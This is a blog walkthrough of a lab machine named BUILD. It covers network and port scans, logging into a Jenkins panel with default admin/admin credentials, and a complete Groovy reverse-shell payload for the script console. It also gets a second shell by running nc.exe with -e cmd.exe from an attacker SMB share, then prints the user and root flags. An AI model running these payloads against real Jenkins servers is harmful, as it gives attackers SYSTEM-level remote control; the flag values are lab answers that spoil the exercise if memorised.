BUILD MACHINE

 BUILD


First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below.

┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.3
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1    d8:44:89:50:2d:a3    (Unknown)
192.168.88.4    00:e0:4c:69:66:4a    (Unknown)
192.168.88.5    00:d8:61:fa:c0:4a    (Unknown)
192.168.88.6    08:00:27:b8:32:ce    (Unknown)
192.168.88.2    fe:63:75:f7:c0:b8    (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.859 seconds (137.71 hosts/sec). 5 responded

Now, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below.
Key open ports and services include:
  • Web Servers:
    • Port 80 (HTTP): Running IIS Windows web server. It supports OPTIONS, TRACE (flagged as potentially risky), GET, HEAD, and POST methods. The webpage title is "IIS Windows."
    • Port 8080 (HTTP-proxy): Likely another web or application server. It has a robots.txt disallowing the root directory and no specific title.
  • Microsoft Windows Services:
    • Port 135 (MSRPC): Microsoft Remote Procedure Call, a core Windows networking component.
    • Port 139 (NetBIOS-SSN): NetBIOS Session Service, part of the SMB suite for file/printer sharing.
    • Port 445 (Microsoft-DS): Primary port for SMB over TCP/IP, used for file sharing and remote administration.
  • Other Services:
    • Port 7680 (Pando-pub): Related to the Pando media booster.
    • Port 5040 & 49664-49670: These ports are open but Nmap could not identify the specific services running on them. The high-numbered ports are often dynamic/ephemeral ports used by Windows services.

┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 192.168.88.6 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 19:55 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:55
Completed NSE at 19:55, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:55
Completed NSE at 19:55, 0.00s elapsed
Initiating ARP Ping Scan at 19:55
Scanning 192.168.88.6 [1 port]
Completed ARP Ping Scan at 19:55, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:55
Scanning 192.168.88.6 [65535 ports]
Discovered open port 8080/tcp on 192.168.88.6
Discovered open port 135/tcp on 192.168.88.6
Discovered open port 445/tcp on 192.168.88.6
Discovered open port 139/tcp on 192.168.88.6
Discovered open port 80/tcp on 192.168.88.6
Discovered open port 49667/tcp on 192.168.88.6
Discovered open port 7680/tcp on 192.168.88.6
Discovered open port 49668/tcp on 192.168.88.6
Discovered open port 49670/tcp on 192.168.88.6
Discovered open port 49669/tcp on 192.168.88.6
Discovered open port 49665/tcp on 192.168.88.6
Discovered open port 49664/tcp on 192.168.88.6
Discovered open port 5040/tcp on 192.168.88.6
Discovered open port 49666/tcp on 192.168.88.6
Completed SYN Stealth Scan at 19:55, 14.62s elapsed (65535 total ports)
NSE: Script scanning 192.168.88.6.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:55
NSE Timing: About 92.96% done; ETC: 19:56 (0:00:02 remaining)
NSE Timing: About 93.45% done; ETC: 19:56 (0:00:04 remaining)
NSE Timing: About 94.24% done; ETC: 19:57 (0:00:06 remaining)
NSE Timing: About 96.75% done; ETC: 19:57 (0:00:04 remaining)
Completed NSE at 19:57, 127.60s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:57
Completed NSE at 19:57, 0.01s elapsed
Nmap scan report for 192.168.88.6
Host is up, received arp-response (0.00080s latency).
Scanned at 2025-07-18 19:55:28 CEST for 142s
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 128
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp   open  msrpc        syn-ack ttl 128
139/tcp   open  netbios-ssn  syn-ack ttl 128
445/tcp   open  microsoft-ds syn-ack ttl 128
5040/tcp  open  unknown      syn-ack ttl 128
7680/tcp  open  pando-pub    syn-ack ttl 128
8080/tcp  open  http-proxy   syn-ack ttl 128
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
49664/tcp open  unknown      syn-ack ttl 128
49665/tcp open  unknown      syn-ack ttl 128
49666/tcp open  unknown      syn-ack ttl 128
49667/tcp open  unknown      syn-ack ttl 128
49668/tcp open  unknown      syn-ack ttl 128
49669/tcp open  unknown      syn-ack ttl 128
49670/tcp open  unknown      syn-ack ttl 128
MAC Address: 08:00:27:B8:32:CE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Host script results:
| nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b8:32:ce (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   BUILD<00>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   BUILD<20>            Flags: <unique><active>
| Statistics:
|   08:00:27:b8:32:ce:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_clock-skew: 9h00m02s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 14903/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 21879/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12318/udp): CLEAN (Timeout)
|   Check 4 (port 18102/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-07-19T02:55:46
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:57
Completed NSE at 19:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:57
Completed NSE at 19:57, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 142.76 seconds
           Raw packets sent: 72722 (3.200MB) | Rcvd: 65536 (2.621MB)

Now we have access to this URL which is but there isn´t any as you can see in the picture below.


Now we have access to this URL which is but there are  a login panel with username and password as you can see in the picture below which credentials are  username(admin) and password (admin).

Now, we want to obtain the access in our attacker machine and should find a name such as script console, as you can see in the second picture below.


 


Now, we have to discover our IP Address and we can discover with this command which is hostname -I, as you can see below.

┌──(root㉿kali)-[/home/luis]
└─# hostname -I
192.168.88.3 172.17.0.1 fd00::109a:ecf0:7b35:32a7 fd00::a00:27ff:fe4d:8a0f

In the next step we have discovered Jenkins reverse_shell which you can see  below.

Thread.start {
String host="192.168.88.3"; (the attacker IP Address)
int port=8044; (Attacker Port listing)
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}

Now, we have to open same port which is 8044 with this command and then execute and we will be able to obtain shell in our machine that you can see below
  • nc -lvnp 8044

┌──(root㉿kali)-[/home/luis]
└─# nc -lvnp 8044
listening on [any] 8044


 

Gotha! we have got the reverse_shell but I want to teach other way that is more interesting to do it.

┌──(root㉿kali)-[/home/luis]
└─# nc -lvnp 8044
listening on [any] 8044 ...
connect to [192.168.88.3] from (UNKNOWN) [192.168.88.6] 51935
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Jenkins> 

Firstly, we ha to execute find / -name nc.exe 2>/dev/null: This command searches the entire file system of the Kali Linux machine for a file named nc.exe. 2>/dev/null redirects any error messages (like "Permission denied") to /dev/null, keeping the output clean.

  • /usr/share/seclists/Web-Shells/FuzzDB/nc.exe

  • /usr/share/windows-resources/binaries/nc.exe

┌──(root㉿kali)-[/home/luis]
└─# find / -name nc.exe 2>/dev/null
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe

In addition, we have to execute cp /usr/share/windows-resources/binaries/nc.exe .: This copies the nc.exe (Netcat for Windows) executable from the Kali Linux resources directory to the current directory (/home/luis). Netcat is a versatile networking utility often called a "TCP/IP Swiss army knife" and is commonly used for creating network connections and listening for incoming connections. In this context, it's used to establish a reverse shell.

┌──(root㉿kali)-[/home/luis]
└─# cp /usr/share/windows-resources/binaries/nc.exe

Finally, ls command confirm has been copied to current directory as you can see below.         

┌──(root㉿kali)-[/home/luis]
└─# ls
Descargas   Escritorio  Música  password_bloodhound  prueba.elf  reverse.php  Vídeos
Documentos  Imágenes    nc.exe  Plantillas           Público     SMS-Bomber   Win7Blue

The impacket-smbserver recurso $(pwd) -smb2support: This command uses impacket-smbserver (from the Impacket toolkit) to set up an SMB server on the Kali machine.
  • recurso: This is the name of the SMB share that will be created.
  • $(pwd): This expands to the current working directory (/home/luis), meaning the contents of /home/luis will be shared via the recurso share.
  • -smb2support: Enables support for SMB2 protocol, which is more common in modern Windows systems.
The output [*] Incoming connection (192.168.88.6,51938) and subsequent AUTHENTICATE_MESSAGE, User BUILD\ authenticated successfully indicate that the target machine (192.168.88.6) has successfully connected to and authenticated with the SMB server. This is crucial because it confirms the target can access the shared nc.exe file.

┌──(root㉿kali)-[/home/luis]
└─# impacket-smbserver recurso $(pwd) -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

[*] Incoming connection (192.168.88.6,51938)
[*] AUTHENTICATE_MESSAGE (\,BUILD)
[*] User BUILD\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:recurso)
[*] Connecting Share(2:IPC$)
[-] SMB2_TREE_CONNECT not found SystemResources
[-] SMB2_TREE_CONNECT not found SystemResources
[*] Disconnecting Share(2:IPC$)

Now, we have to execute the command which you can see below:

println "\\\\192.168.88.3\\recurso\\nc.exe 192.168.88.3 4444 -e cmd.exe".execute().text: This is the critical command executed on the Jenkins server (192.168.88.6) where you must execute in the Jenkins web.

┌──(luis㉿kali)-[~/Descargas]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.88.3] from (UNKNOWN) [192.168.88.6] 51939
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Jenkins>
C:\Program Files\Jenkins>whoami
whoami
nt authority\system

C:\Program Files\Jenkins>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Program Files\Jenkins

05/31/2025  10:38 AM    <DIR>          .
05/31/2025  10:38 AM    <DIR>          ..
07/18/2025  07:53 PM            28,291 jenkins.err.log
05/28/2025  10:10 AM           620,544 jenkins.exe
05/28/2025  01:32 PM               219 jenkins.exe.config
05/31/2025  11:08 AM               156 jenkins.out.log
05/28/2025  01:14 PM        94,299,904 Jenkins.war
07/18/2025  07:53 PM             4,934 jenkins.wrapper.log
05/31/2025  10:38 AM             3,003 jenkins.xml
               7 File(s)     94,957,051 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Program Files\Jenkins>cd ..
cd ..

C:\Program Files>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Program Files

05/31/2025  10:38 AM    <DIR>          .
05/31/2025  10:38 AM    <DIR>          ..
05/31/2025  10:37 AM    <DIR>          Common Files
05/05/2023  05:27 AM    <DIR>          Internet Explorer
05/31/2025  10:37 AM    <DIR>          Java
05/31/2025  10:38 AM    <DIR>          Jenkins
12/07/2019  02:14 AM    <DIR>          ModifiableWindowsApps
05/31/2025  10:31 AM    <DIR>          Windows Defender
05/05/2023  05:27 AM    <DIR>          Windows Mail
05/05/2023  05:27 AM    <DIR>          Windows Media Player
12/07/2019  02:54 AM    <DIR>          Windows Multimedia Platform
12/07/2019  02:50 AM    <DIR>          Windows NT
05/05/2023  05:27 AM    <DIR>          Windows Photo Viewer
12/07/2019  02:54 AM    <DIR>          Windows Portable Devices
12/07/2019  02:31 AM    <DIR>          Windows Security
12/07/2019  02:31 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              16 Dir(s)  32,729,485,312 bytes free

C:\Program Files>cd Jenkins
cd Jenkins

C:\Program Files\Jenkins>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Program Files\Jenkins

05/31/2025  10:38 AM    <DIR>          .
05/31/2025  10:38 AM    <DIR>          ..
07/18/2025  07:53 PM            28,291 jenkins.err.log
05/28/2025  10:10 AM           620,544 jenkins.exe
05/28/2025  01:32 PM               219 jenkins.exe.config
05/31/2025  11:08 AM               156 jenkins.out.log
05/28/2025  01:14 PM        94,299,904 Jenkins.war
07/18/2025  07:53 PM             4,934 jenkins.wrapper.log
05/31/2025  10:38 AM             3,003 jenkins.xml
               7 File(s)     94,957,051 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Program Files\Jenkins>cd ..
cd ..

C:\Program Files>cd ..
cd ..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\

05/31/2025  11:07 AM    <DIR>          inetpub
12/07/2019  02:14 AM    <DIR>          PerfLogs
05/31/2025  10:38 AM    <DIR>          Program Files
05/31/2025  10:31 AM    <DIR>          Program Files (x86)
05/31/2025  11:09 AM    <DIR>          Users
05/31/2025  11:07 AM    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  32,729,485,312 bytes free

C:\>cd Users    
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users

05/31/2025  11:09 AM    <DIR>          .
05/31/2025  11:09 AM    <DIR>          ..
05/31/2025  10:22 AM    <DIR>          Administrator
05/31/2025  10:01 AM    <DIR>          builder
07/18/2025  07:57 PM    <DIR>          DefaultAppPool
05/31/2025  12:50 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  32,729,485,312 bytes free

C:\Users>cd builder
cd builder

C:\Users\builder>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users\builder

05/31/2025  10:01 AM    <DIR>          .
05/31/2025  10:01 AM    <DIR>          ..
05/31/2025  12:50 AM    <DIR>          3D Objects
05/31/2025  12:50 AM    <DIR>          Contacts
05/31/2025  10:50 AM    <DIR>          Desktop
05/31/2025  12:50 AM    <DIR>          Documents
05/31/2025  12:50 AM    <DIR>          Downloads
05/31/2025  12:50 AM    <DIR>          Favorites
05/31/2025  12:50 AM    <DIR>          Links
05/31/2025  12:50 AM    <DIR>          Music
05/31/2025  12:52 AM    <DIR>          OneDrive
05/31/2025  12:52 AM    <DIR>          Pictures
05/31/2025  12:50 AM    <DIR>          Saved Games
05/31/2025  12:51 AM    <DIR>          Searches
05/31/2025  12:50 AM    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  32,729,485,312 bytes free

C:\Users\builder>cd Desktop
cd Desktop

C:\Users\builder\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

Gotcha! I have to discovered the user flag you can see below in this path which is:
  • C:\Users\builder\Desktop\user.txt

 Directory of C:\Users\builder\Desktop

05/31/2025  10:50 AM    <DIR>          .
05/31/2025  10:50 AM    <DIR>          ..
05/31/2025  10:50 AM                35 user.txt
               1 File(s)             35 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Users\builder\Desktop>type user.txt
type user.txt
17a6390c294493b8fc423154791cdd0b

C:\Users\builder\Desktop>

C:\Users\builder\Desktop>cd ..
cd ..

C:\Users\builder>cd ..
cd ..

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users

05/31/2025  11:09 AM    <DIR>          .
05/31/2025  11:09 AM    <DIR>          ..
05/31/2025  10:22 AM    <DIR>          Administrator
05/31/2025  10:01 AM    <DIR>          builder
07/18/2025  07:57 PM    <DIR>          DefaultAppPool
05/31/2025  12:50 AM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  32,729,485,312 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

 Directory of C:\Users\Administrator

05/31/2025  10:22 AM    <DIR>          .
05/31/2025  10:22 AM    <DIR>          ..
05/31/2025  10:18 AM    <DIR>          3D Objects
05/31/2025  10:18 AM    <DIR>          Contacts
05/31/2025  10:52 AM    <DIR>          Desktop
05/31/2025  10:18 AM    <DIR>          Documents
05/31/2025  10:18 AM    <DIR>          Downloads
05/31/2025  10:18 AM    <DIR>          Favorites
05/31/2025  10:18 AM    <DIR>          Links
05/31/2025  10:18 AM    <DIR>          Music
05/31/2025  10:22 AM    <DIR>          OneDrive
05/31/2025  10:18 AM    <DIR>          Pictures
05/31/2025  10:18 AM    <DIR>          Saved Games
05/31/2025  10:18 AM    <DIR>          Searches
05/31/2025  10:18 AM    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  32,729,485,312 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E8FF-21CA

Gotcha! I have to discovered the root flag you can see below in this path which is:
  • C:\Users\Administrator\Desktop

 Directory of C:\Users\Administrator\Desktop

05/31/2025  10:52 AM    <DIR>          .
05/31/2025  10:52 AM    <DIR>          ..
05/31/2025  10:51 AM                35 root.txt
               1 File(s)             35 bytes
               2 Dir(s)  32,729,485,312 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
927c9a24e72f5d76ffd8bc9c2477d10f

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »